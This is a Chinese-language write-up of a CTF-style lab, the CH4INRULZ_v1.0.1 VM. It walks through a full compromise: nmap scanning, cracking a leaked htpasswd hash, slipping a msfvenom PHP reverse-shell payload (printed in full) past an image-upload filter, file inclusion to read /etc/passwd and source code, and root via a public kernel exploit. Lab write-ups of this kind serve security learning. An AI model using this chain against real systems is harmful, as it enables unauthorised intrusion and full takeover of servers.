关于

信息收集

  • 网卡:vboxnet0,192.168.56.1/24,Nmap扫存活主机发现IP为192.168.56.101

➜  ~ nmap -sn 192.168.56.1/24

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 20:28 CST

Nmap scan report for 192.168.56.1

Host is up (0.0017s latency).

Nmap scan report for 192.168.56.101

Host is up (0.00035s latency).

Nmap done: 256 IP addresses (2 hosts up) scanned in 2.62 seconds

➜  ~ nmap -T4 -A 192.168.56.101

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 20:29 CST

Nmap scan report for 192.168.56.101

Host is up (0.000089s latency).

Not shown: 996 closed ports

PORT     STATE SERVICE VERSION

21/tcp   open  ftp     vsftpd 2.3.5

|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

| ftp-syst:

|   STAT:

| FTP server status:

|      Connected to 192.168.56.1

|      Logged in as ftp

|      TYPE: ASCII

|      No session bandwidth limit

|      Session timeout in seconds is 300

|      Control connection is plain text

|      Data connections will be plain text

|      At session startup, client count was 3

|      vsFTPd 2.3.5 - secure, fast, stable

|_End of status

22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)

|   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)

|_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)

80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))

|_http-server-header: Apache/2.2.22 (Ubuntu)

|_http-title: FRANK's Website | Under development

8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

|_http-server-header: Apache/2.2.22 (Ubuntu)

|_http-title: Site doesn't have a title (text/html).

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 13.68 seconds

➜  ~
  • 开了FTP,SSH,还开了两个Web服务,dirb扫Web目录发现一个HTTP基本认证的目录和一个API调用接口。
http://192.168.56.101/development

有密码暂时进不了

http://192.168.56.101:8011/api/

标题:FRANK's API | Under development

页面的意思大概就是这个API用于Frank的服务器,但还在开发中
  • 继续dirb扫备份文件,找到了基本认证的加密过的密码
➜  ~ dirb http://192.168.56.101 -X .bak

找到了

http://192.168.56.101/index.html.bak

➜  ~ curl http://192.168.56.101/index.html.bak

<html><body><h1>It works!</h1>

<p>This is the default web page for this server.</p>

<p>The web server software is running but no content has been added, yet.</p>

<a href="/development">development</a>

<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->

</body></html>
  • 保存到文件,John破解得密码是frank!!!
➜  ~ echo 'frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0' >hash.txt

➜  ~ john hash.txt

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-opencl"

Use the "--format=md5crypt-opencl" option to force loading these as that type instead

Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 SSE2 12x])

Will run 4 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

frank!!!         (frank)

1g 0:00:00:00 DONE 1/3 (2018-10-28 00:17) 9.090g/s 1718p/s 1718c/s 1718C/s Frank[..Fr4nk

Use the "--show" option to display all of the cracked passwords reliably

Session completed

➜  ~
  • 用上面的用户密码登录基本认证发现
* Here is my unfinished tools list

- the uploader tool (finished but need security review)

*这是我未完成的工具清单

- 上传工具(已完成但需要安全审查)
  • 继续用dirb加上认证扫目录,发现了有上传,并只能上传图片
 dirb http://192.168.56.101/development/ -u 'frank:frank!!!'

 发现了

 http://192.168.56.101/development/uploader/

 http://192.168.56.101/development/uploader/upload

 Sorry, file already exists.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

绕过上传

  • msf生产反弹后门,加GIF98文件头,用脚绕了。
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPOST=7788  -o shell.php

➜  ~ echo "GIF98" >666.gif

➜  ~ cat 666.gif

GIF98

➜  ~ cat shell.php >>666.gif

➜  ~ cat 666.gif

GIF98

/*<?php /**/ error_reporting(0); $ip = '192.168.56.1'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();%
  • 上传成功,但不知道路径在哪里。要是猜肯定很难找,还不如找其他方法。上面还有一个API接口没有用上。
http://192.168.56.101/development/uploader/upload.php

上传脚本的路径
  • API除了files_api.php可以访问,其他的都是404,但是也不知道他接受什么参数,先fuzz一波
➜  ~ wfuzz -w Kali-Team/fuzzdb/attack/business-logic/CommonMethodNames.txt --hl 6 'http://192.168.56.101:8011/api/files_api.php?FUZZ=/etc/passwd'

********************************************************

* Wfuzz 2.2.11 - The Web Fuzzer                        *

********************************************************

Target: http://192.168.56.101:8011/api/files_api.php?FUZZ=/etc/passwd

Total requests: 77

==================================================================

ID	Response   Lines      Word         Chars          Payload

==================================================================

000033:  C=500      5 L	      19 W	    173 Ch	  "file"

Total time: 0.127410

Processed Requests: 77

Filtered Requests: 76

Requests/sec.: 604.3439
  • 发现接收的参数为file,但是好像被拦截了。试了POST请求可以。
➜  ~ curl "http://192.168.56.101:8011/api/files_api.php" -d "file=/etc/passwd"

<head>

  <title>franks website | simple website browser API</title>

</head>

root:x:0:0:root:/root:/bin/bash

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

libuuid:x:100:101::/var/lib/libuuid:/bin/sh

syslog:x:101:103::/home/syslog:/bin/false

frank:x:1000:1000:frank,,,:/home/frank:/bin/bash

sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin

ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false
  • 接着用文件包含读取upload的源码
➜  ~ curl "http://192.168.56.101:8011/api/files_api.php" -d "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php"

<head>

  <title>franks website | simple website browser API</title>

</head>

PD9waHAKJHRhcmdldF9kaXIgPSAiRlJBTkt1cGxvYWRzLyI7CiR0YXJnZXRfZmlsZSA9ICR0YXJnZXRfZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSk7CiR1cGxvYWRPayA9IDE7CiRpbWFnZUZpbGVUeXBlID0gc3RydG9sb3dlcihwYXRoaW5mbygkdGFyZ2V0X2ZpbGUsUEFUSElORk9fRVhURU5TSU9OKSk7Ci8vIENoZWNrIGlmIGltYWdlIGZpbGUgaXMgYSBhY3R1YWwgaW1hZ2Ugb3IgZmFrZSBpbWFnZQppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgJGNoZWNrID0gZ2V0aW1hZ2VzaXplKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJ0bXBfbmFtZSJdKTsKICAgIGlmKCRjaGVjayAhPT0gZmFsc2UpIHsKICAgICAgICBlY2hvICJGaWxlIGlzIGFuIGltYWdlIC0gIiAuICRjaGVja1sibWltZSJdIC4gIi4iOwogICAgICAgICR1cGxvYWRPayA9IDE7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkZpbGUgaXMgbm90IGFuIGltYWdlLiI7CiAgICAgICAgJHVwbG9hZE9rID0gMDsKICAgIH0KfQovLyBDaGVjayBpZiBmaWxlIGFscmVhZHkgZXhpc3RzCmlmIChmaWxlX2V4aXN0cygkdGFyZ2V0X2ZpbGUpKSB7CiAgICBlY2hvICJTb3JyeSwgZmlsZSBhbHJlYWR5IGV4aXN0cy4iOwogICAgJHVwbG9hZE9rID0gMDsKfQovLyBDaGVjayBmaWxlIHNpemUKaWYgKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJzaXplIl0gPiA1MDAwMDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgaXMgdG9vIGxhcmdlLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIEFsbG93IGNlcnRhaW4gZmlsZSBmb3JtYXRzCmlmKCRpbWFnZUZpbGVUeXBlICE9ICJqcGciICYmICRpbWFnZUZpbGVUeXBlICE9ICJwbmciICYmICRpbWFnZUZpbGVUeXBlICE9ICJqcGVnIgomJiAkaW1hZ2VGaWxlVHlwZSAhPSAiZ2lmIiApIHsKICAgIGVjaG8gIlNvcnJ5LCBvbmx5IEpQRywgSlBFRywgUE5HICYgR0lGIGZpbGVzIGFyZSBhbGxvd2VkLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIENoZWNrIGlmICR1cGxvYWRPayBpcyBzZXQgdG8gMCBieSBhbiBlcnJvcgppZiAoJHVwbG9hZE9rID09IDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgd2FzIG5vdCB1cGxvYWRlZC4iOwovLyBpZiBldmVyeXRoaW5nIGlzIG9rLCB0cnkgdG8gdXBsb2FkIGZpbGUKfSBlbHNlIHsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bInRtcF9uYW1lIl0sICR0YXJnZXRfZmlsZSkpIHsKICAgICAgICBlY2hvICJUaGUgZmlsZSAiLiBiYXNlbmFtZSggJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSkuICIgaGFzIGJlZW4gdXBsb2FkZWQgdG8gbXkgdXBsb2FkcyBwYXRoLiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIlNvcnJ5LCB0aGVyZSB3YXMgYW4gZXJyb3IgdXBsb2FkaW5nIHlvdXIgZmlsZS4iOwogICAgfQp9Cj8+Cgo=
  • base64解码发现上传目录是FRANKuploads,之前的木马图片就在这个文件夹里。
<?php

$target_dir = "FRANKuploads/";

$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

$uploadOk = 1;

$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));

// Check if image file is a actual image or fake image

if(isset($_POST["submit"])) {

    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);

    if($check !== false) {

        echo "File is an image - " . $check["mime"] . ".";

        $uploadOk = 1;

    } else {

        echo "File is not an image.";

        $uploadOk = 0;

    }

}

// Check if file already exists

if (file_exists($target_file)) {

    echo "Sorry, file already exists.";

    $uploadOk = 0;

}

// Check file size

if ($_FILES["fileToUpload"]["size"] > 500000) {

    echo "Sorry, your file is too large.";

    $uploadOk = 0;

}

// Allow certain file formats

if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"

&& $imageFileType != "gif" ) {

    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";

    $uploadOk = 0;

}

// Check if $uploadOk is set to 0 by an error

if ($uploadOk == 0) {

    echo "Sorry, your file was not uploaded.";

// if everything is ok, try to upload file

} else {

    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {

        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";

    } else {

        echo "Sorry, there was an error uploading your file.";

    }

}

?>

GET SHELL

  • 打开msf监听刚刚生成木马的端口,再次使用一次文件包含执行上传的木马。
msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lport 4444

lport => 4444

msf exploit(multi/handler) > set lhost  192.168.56.1

lhost => 192.168.56.1

msf exploit(multi/handler) > run 

[*] Started reverse TCP handler on 192.168.56.1:4444

[*] Sending stage (37775 bytes) to 192.168.56.101

[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:45900) at 2018-10-28 13:15:14 +0800

meterpreter >

➜  ~ curl "http://192.168.56.101:8011/api/files_api.php" -d "file=/var/www/development/uploader/FRANKuploads/2333.gif"

提权+GetFlag

  • 试了N个终于找到了一个可以用的exploits/linux_x86-64/local/15023.c
uname -a

Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux

meterpreter > upload /home/kali-team/Kali-Team/exploit-database/exploits/linux_x86-64/local/15023.c

[*] uploading  : /home/kali-team/Kali-Team/exploit-database/exploits/linux_x86-64/local/15023.c -> 15023.c

[*] Uploaded -1.00 B of 5.17 KiB (-0.02%): /home/kali-team/Kali-Team/exploit-database/exploits/linux_x86-64/local/15023.c -> 15023.c

[*] uploaded   : /home/kali-team/Kali-Team/exploit-database/exploits/linux_x86-64/local/15023.c -> 15023.c

meterpreter > ls

Listing: /tmp

=============

Mode              Size   Type  Last modified              Name

----              ----   ----  -------------              ----

100644/rw-r--r--  5297   fil   2018-10-27 09:35:19 +0800  15023.c

100644/rw-r--r--  25298  fil   2018-10-27 09:30:57 +0800  15024.c

100644/rw-r--r--  8835   fil   2018-10-27 09:27:09 +0800  15150.c

100644/rw-r--r--  9487   fil   2018-10-27 09:24:34 +0800  15704.c

meterpreter > shell

Process 1287 created.

Channel 8 created.

gcc 15023.c

ls

15023.c

15024.c

15150.c

15704.c

a.out

./a.out

id

uid=0(root) gid=0(root) groups=0(root)

cd /root

ls

root.txt

cat root.txt

8f420533b79076cc99e9f95a1a4e5568

Write-up-CH4INRULZ_v1.0.1的更多相关文章

  1. 靶机CH4INRULZ_v1.0.1

    nmap开路. root@kali:~# nmap -sP 192.168.1.* //拿到靶机地址192.168.1.8 root@kali:~# nmap -p- -sS -v -sV 192.1 ...

  2. 靶场渗透CH4INRULZ_v1.0.1

    最新文章见我个人博客:点此 靶机环境下载地址:[下载] ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247 ...

  3. 靶场vulnhub-CH4INRULZ_v1.0.1通关

    1.CH4INRULZ_v1.0.1靶场通关 ch4inrulz是vulnhub下的基于Linux的一个靶场,作为练习之用 目的:通过各种手段,获取到靶机内的flag的内容 2.环境搭建: 攻击机 K ...

  4. ZAM 3D 制作简单的3D字幕 流程(二)

    原地址:http://www.cnblogs.com/yk250/p/5663907.html 文中表述仅为本人理解,若有偏差和错误请指正! 接着 ZAM 3D 制作简单的3D字幕 流程(一) .本篇 ...

  5. ZAM 3D 制作3D动画字幕 用于Xaml导出

    原地址-> http://www.cnblogs.com/yk250/p/5662788.html 介绍:对经常使用Blend做动画的人来说,ZAM 3D 也很好上手,专业制作3D素材的XAML ...

  6. 微信小程序省市区选择器对接数据库

    前言,小程序本身是带有地区选着器的(网站:https://mp.weixin.qq.com/debug/wxadoc/dev/component/picker.html),由于自己开发的程序的数据是很 ...

  7. osg编译日志

    1>------ 已启动全部重新生成: 项目: ZERO_CHECK, 配置: Debug x64 ------1> Checking Build System1> CMake do ...

  8. 【AR实验室】OpenGL ES绘制相机(OpenGL ES 1.0版本)

    0x00 - 前言 之前做一些移动端的AR应用以及目前看到的一些AR应用,基本上都是这样一个套路:手机背景显示现实场景,然后在该背景上进行图形学绘制.至于图形学绘制时,相机外参的解算使用的是V-SLA ...

  9. Elasticsearch 5.0 中term 查询和match 查询的认识

    Elasticsearch 5.0 关于term query和match query的认识 一.基本情况 前言:term query和match query牵扯的东西比较多,例如分词器.mapping ...

  10. Swift3.0服务端开发(一) 完整示例概述及Perfect环境搭建与配置(服务端+iOS端)

    本篇博客算是一个开头,接下来会持续更新使用Swift3.0开发服务端相关的博客.当然,我们使用目前使用Swift开发服务端较为成熟的框架Perfect来实现.Perfect框架是加拿大一个创业团队开发 ...

随机推荐

  1. php头像上传插件

    最近找到了一个比较简单实用的php头像上传插件,兼容IE8及以上等主流浏览器,分享给大家.效果如下: 1.首页效果图:默认显示默认图片. 2.点击图片(拥有裁剪框,可以拖动.缩放.裁剪头像等功能,注意 ...

  2. IS加载JSON 和 MP4文件 错误 404 提示 需要添加mime映射(默认IIS Express里没有映射)

    问题描述 在发布项目的时候,有一些文件是json文件,在网页中进行加载,但是在IIS7发布的时候,json文件居然是404,无法找到,在URL上输入地址也一样. 错误原因 IIS内部机制,不支持直接访 ...

  3. 洛谷 P1981 表达式求值(模拟)

    嗯... 题目链接:https://www.luogu.org/problem/P1981 这道题其实是数组模拟栈.首先处理乘法:注意从后往前处理,处理后归零.然后把数都加起来即可. AC代码: #i ...

  4. 常用工具api等链接

    java技术驿站 http://cmsblogs.com/ WatchMen(守望者成才网) http://www.watchmen.cn/ JAVA知识分享 http://www.java1234. ...

  5. 使用Kubespray在ubuntu上自动部署K8s1.9.0集群

    Kubespray 是 Kubernetes incubator 中的项目,目标是提供 Production Ready Kubernetes 部署方案,该项目基础是通过 Ansible Playbo ...

  6. MS17_010漏洞攻击Windows7

    攻击主机系统:Kali Linux 2018 目标主机系统:Windows7 x64 1.攻击主机启动Metasploit: msfconsole 2.查找MS17_010漏洞相关的信息: searc ...

  7. springboot2.x整合redis

    pom文件 <!--springboot中的redis依赖--> <dependency> <groupId>org.springframework.boot< ...

  8. JDBC 通过读取文件进行初始化

  9. idea 启动java项目报错 java: 程序包javax.servlet.http不存在

    File -- Project Structure

  10. vs2008每次build都会重新编译链接 && 项目已经过期

    转自:http://blog.csdn.net/movezzzz/article/details/6816605 无外乎两种情况: 1.时间问题,所创建的文件的时间比如是:2011-09-22 09: ...